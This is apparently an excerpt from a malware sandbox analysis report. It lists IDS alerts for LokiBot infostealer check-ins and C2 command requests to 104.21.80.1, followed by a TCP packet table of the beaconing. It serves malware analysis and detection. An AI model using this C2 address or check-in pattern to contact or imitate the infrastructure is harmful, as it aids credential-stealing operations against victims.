2025-02-25T15:38:53.402371+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50033	104.21.80.1	80	TCP
2025-02-25T15:38:53.402371+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50033	104.21.80.1	80	TCP
2025-02-25T15:38:54.163663+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50033	104.21.80.1	80	TCP
2025-02-25T15:38:54.163663+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50033	104.21.80.1	80	TCP
2025-02-25T15:38:54.168628+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50033	TCP
2025-02-25T15:38:55.331665+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50034	104.21.80.1	80	TCP
2025-02-25T15:38:55.331665+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50034	104.21.80.1	80	TCP
2025-02-25T15:38:55.331665+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50034	104.21.80.1	80	TCP
2025-02-25T15:38:56.087276+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50034	104.21.80.1	80	TCP
2025-02-25T15:38:56.087276+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50034	104.21.80.1	80	TCP
2025-02-25T15:38:57.256281+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50035	104.21.80.1	80	TCP
2025-02-25T15:38:57.256281+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50035	104.21.80.1	80	TCP
2025-02-25T15:38:57.256281+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50035	104.21.80.1	80	TCP
2025-02-25T15:38:58.054933+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50035	104.21.80.1	80	TCP
2025-02-25T15:38:58.054933+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50035	104.21.80.1	80	TCP
2025-02-25T15:38:58.059915+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50035	TCP
2025-02-25T15:38:59.246009+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50036	104.21.80.1	80	TCP
2025-02-25T15:38:59.246009+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50036	104.21.80.1	80	TCP
2025-02-25T15:38:59.246009+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50036	104.21.80.1	80	TCP
2025-02-25T15:38:59.986604+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50036	104.21.80.1	80	TCP
2025-02-25T15:38:59.986604+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50036	104.21.80.1	80	TCP
2025-02-25T15:39:01.151194+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50037	104.21.80.1	80	TCP
2025-02-25T15:39:01.151194+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50037	104.21.80.1	80	TCP
2025-02-25T15:39:01.151194+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50037	104.21.80.1	80	TCP
2025-02-25T15:39:01.904643+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50037	104.21.80.1	80	TCP
2025-02-25T15:39:01.904643+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50037	104.21.80.1	80	TCP
2025-02-25T15:39:01.909519+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50037	TCP
2025-02-25T15:39:03.225173+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50038	104.21.80.1	80	TCP
2025-02-25T15:39:03.225173+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50038	104.21.80.1	80	TCP
2025-02-25T15:39:03.225173+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50038	104.21.80.1	80	TCP
2025-02-25T15:39:03.981302+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50038	104.21.80.1	80	TCP
2025-02-25T15:39:03.981302+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50038	104.21.80.1	80	TCP
2025-02-25T15:39:03.986284+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50038	TCP
2025-02-25T15:39:05.179203+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50039	104.21.80.1	80	TCP
2025-02-25T15:39:05.179203+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50039	104.21.80.1	80	TCP
2025-02-25T15:39:05.179203+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50039	104.21.80.1	80	TCP
2025-02-25T15:39:05.946773+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50039	104.21.80.1	80	TCP
2025-02-25T15:39:05.946773+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50039	104.21.80.1	80	TCP
2025-02-25T15:39:05.951655+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.5	50039	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2025 15:37:03.826936007 CET	49704	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:03.831993103 CET	80	49704	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:03.832253933 CET	49704	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:03.834379911 CET	49704	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:03.839307070 CET	80	49704	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:03.839421034 CET	49704	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:03.844297886 CET	80	49704	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:04.607664108 CET	80	49704	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:04.607898951 CET	49704	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:04.608916998 CET	80	49704	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:04.609020948 CET	49704	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:04.612864017 CET	80	49704	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:05.871805906 CET	49705	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:05.876892090 CET	80	49705	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:05.876976013 CET	49705	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:05.879350901 CET	49705	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:05.884272099 CET	80	49705	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:05.884394884 CET	49705	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:05.889384985 CET	80	49705	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:06.603734016 CET	80	49705	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:06.604034901 CET	49705	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:06.605129957 CET	80	49705	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:06.605186939 CET	49705	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:06.609833956 CET	80	49705	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:06.665585041 CET	49706	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:06.670665979 CET	80	49706	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:06.670831919 CET	49706	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:06.672959089 CET	49706	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:06.677946091 CET	80	49706	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:06.678042889 CET	49706	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:06.682991028 CET	80	49706	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:07.419003963 CET	80	49706	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:07.419215918 CET	49706	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:07.420152903 CET	80	49706	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:07.420211077 CET	49706	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:07.424101114 CET	80	49706	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:08.634069920 CET	49707	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:08.639081001 CET	80	49707	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:08.639152050 CET	49707	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:08.641653061 CET	49707	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:08.646526098 CET	80	49707	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:08.646573067 CET	49707	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:08.651463985 CET	80	49707	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:09.420542002 CET	80	49707	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:09.420736074 CET	49707	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:09.421055079 CET	80	49707	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:09.421128988 CET	49707	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:09.425647974 CET	80	49707	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:10.568092108 CET	49708	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:10.574897051 CET	80	49708	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:10.575022936 CET	49708	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:10.577058077 CET	49708	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:10.582009077 CET	80	49708	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:10.582091093 CET	49708	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:10.588349104 CET	80	49708	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:11.351828098 CET	80	49708	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:11.352081060 CET	49708	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:11.352554083 CET	80	49708	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:11.352619886 CET	49708	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:11.357003927 CET	80	49708	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:12.489836931 CET	49709	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:12.494813919 CET	80	49709	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:12.494950056 CET	49709	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:12.496712923 CET	49709	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:12.501643896 CET	80	49709	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:12.501734018 CET	49709	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:12.506711960 CET	80	49709	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:13.245565891 CET	80	49709	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:13.245781898 CET	49709	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:13.246129990 CET	80	49709	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:13.246258974 CET	49709	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:13.250782013 CET	80	49709	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:14.411478043 CET	49710	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:14.416496992 CET	80	49710	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:14.416635990 CET	49710	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:14.418770075 CET	49710	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:14.423700094 CET	80	49710	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:14.423788071 CET	49710	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:14.428705931 CET	80	49710	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:15.203108072 CET	80	49710	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:15.203334093 CET	49710	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:15.203528881 CET	80	49710	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:15.203584909 CET	49710	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:15.208322048 CET	80	49710	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:16.348762989 CET	49711	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:16.353787899 CET	80	49711	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:16.353949070 CET	49711	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:16.356118917 CET	49711	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:16.361007929 CET	80	49711	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:16.361092091 CET	49711	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:16.366046906 CET	80	49711	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:17.303005934 CET	80	49711	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:17.303127050 CET	49711	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:17.304630041 CET	80	49711	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:17.304681063 CET	49711	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:17.310199022 CET	80	49711	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:18.457973957 CET	49717	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:18.462897062 CET	80	49717	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:18.462979078 CET	49717	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:18.465030909 CET	49717	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:18.470010042 CET	80	49717	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:18.470113993 CET	49717	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:18.475043058 CET	80	49717	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:19.261419058 CET	80	49717	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:19.261540890 CET	49717	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:19.262382030 CET	80	49717	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:19.262598991 CET	49717	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:19.266515017 CET	80	49717	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:20.437057972 CET	49725	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:20.442136049 CET	80	49725	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:20.442222118 CET	49725	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:20.444559097 CET	49725	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:20.449502945 CET	80	49725	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:20.449634075 CET	49725	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:20.454644918 CET	80	49725	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:21.219005108 CET	80	49725	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:21.219928026 CET	49725	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:21.220047951 CET	80	49725	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:21.220361948 CET	49725	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:21.224827051 CET	80	49725	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:22.503987074 CET	49741	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:22.508982897 CET	80	49741	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:22.509068966 CET	49741	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:22.511281013 CET	49741	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:22.516222000 CET	80	49741	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:22.516316891 CET	49741	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:22.521265984 CET	80	49741	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:23.245028019 CET	80	49741	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:23.245147943 CET	49741	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:23.245836020 CET	80	49741	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:23.245892048 CET	49741	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:23.250071049 CET	80	49741	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:24.429344893 CET	49752	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:24.434365988 CET	80	49752	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:24.434452057 CET	49752	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:24.437877893 CET	49752	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:24.442775965 CET	80	49752	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:24.442831993 CET	49752	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:24.448837042 CET	80	49752	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:25.199510098 CET	80	49752	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:25.200284958 CET	80	49752	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:25.200397015 CET	49752	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:25.200490952 CET	49752	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:25.205420971 CET	80	49752	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:26.350682020 CET	49764	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:26.355624914 CET	80	49764	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:26.355698109 CET	49764	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:26.357697010 CET	49764	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:26.362637043 CET	80	49764	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:26.362703085 CET	49764	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:26.367577076 CET	80	49764	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:27.144653082 CET	80	49764	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:27.145008087 CET	49764	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:27.145570040 CET	80	49764	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:27.145646095 CET	49764	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:27.149933100 CET	80	49764	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:28.312468052 CET	49779	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:28.317708969 CET	80	49779	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:28.317805052 CET	49779	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:28.319997072 CET	49779	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:28.324892998 CET	80	49779	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:28.324980021 CET	49779	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:28.329910994 CET	80	49779	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:29.115999937 CET	80	49779	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:29.117371082 CET	49779	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:29.117441893 CET	80	49779	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:29.117539883 CET	49779	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:29.122307062 CET	80	49779	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:30.270101070 CET	49792	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:30.275121927 CET	80	49792	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:30.275218010 CET	49792	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:30.277637959 CET	49792	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:30.282556057 CET	80	49792	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:30.282635927 CET	49792	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:30.287579060 CET	80	49792	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:31.069602013 CET	80	49792	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:31.069700003 CET	80	49792	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:31.069824934 CET	49792	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:31.069861889 CET	49792	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:31.075212955 CET	80	49792	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:32.242398977 CET	49804	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:32.247414112 CET	80	49804	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:32.247505903 CET	49804	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:32.249792099 CET	49804	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:32.258199930 CET	80	49804	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:32.262944937 CET	49804	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:32.267890930 CET	80	49804	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:32.994560003 CET	80	49804	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:32.994643927 CET	80	49804	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:32.994690895 CET	49804	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:32.994849920 CET	49804	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:32.999980927 CET	80	49804	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:34.157335997 CET	49819	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:34.162569046 CET	80	49819	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:34.162945032 CET	49819	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:34.165096045 CET	49819	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:34.170665026 CET	80	49819	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:34.171066046 CET	49819	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:34.176752090 CET	80	49819	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:34.936084986 CET	80	49819	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:34.936275959 CET	49819	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:34.937602043 CET	80	49819	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:34.937659979 CET	49819	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:34.941163063 CET	80	49819	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:36.084177017 CET	49832	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:36.089240074 CET	80	49832	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:36.089345932 CET	49832	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:36.091454983 CET	49832	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:36.096405029 CET	80	49832	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:36.096465111 CET	49832	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:36.101414919 CET	80	49832	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:36.860110044 CET	80	49832	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:36.860420942 CET	49832	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:36.860780001 CET	80	49832	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:36.860846043 CET	49832	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:36.866044998 CET	80	49832	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:38.004111052 CET	49846	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:38.010148048 CET	80	49846	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:38.010273933 CET	49846	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:38.012402058 CET	49846	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:38.017450094 CET	80	49846	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:38.017544985 CET	49846	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:38.022558928 CET	80	49846	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:38.830161095 CET	80	49846	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:38.830471039 CET	49846	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:38.831820011 CET	80	49846	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:38.831876993 CET	49846	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:38.835367918 CET	80	49846	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:39.981673956 CET	49860	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:39.986716032 CET	80	49860	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:39.986826897 CET	49860	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:39.989026070 CET	49860	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:39.993983984 CET	80	49860	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:39.994211912 CET	49860	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:39.999140978 CET	80	49860	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:40.743145943 CET	80	49860	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:40.743613005 CET	49860	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:40.743964911 CET	80	49860	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:40.744223118 CET	49860	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:40.748565912 CET	80	49860	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:41.886537075 CET	49873	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:41.891495943 CET	80	49873	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:41.891580105 CET	49873	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:41.894064903 CET	49873	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:41.898968935 CET	80	49873	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:41.899055004 CET	49873	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:41.904031992 CET	80	49873	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:42.673965931 CET	80	49873	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:42.675049067 CET	80	49873	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:42.675209045 CET	49873	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:42.675292015 CET	49873	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:42.683387995 CET	80	49873	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:43.821191072 CET	49886	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:43.826262951 CET	80	49886	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:43.826370001 CET	49886	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:43.828835964 CET	49886	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:43.834825993 CET	80	49886	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:43.834928036 CET	49886	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:43.840969086 CET	80	49886	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:44.600754023 CET	80	49886	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:44.600915909 CET	49886	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:44.602005959 CET	80	49886	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:44.602062941 CET	49886	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:44.606839895 CET	80	49886	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:45.754096031 CET	49900	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:45.759808064 CET	80	49900	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:45.759917021 CET	49900	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:45.762209892 CET	49900	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:45.768285036 CET	80	49900	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:45.768346071 CET	49900	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:45.774457932 CET	80	49900	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:46.548482895 CET	80	49900	104.21.80.1	192.168.2.5
Feb 25, 2025 15:37:46.548763990 CET	49900	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:37:46.549742937 CET	80	49900	104.21.80.1	192.168.2.5
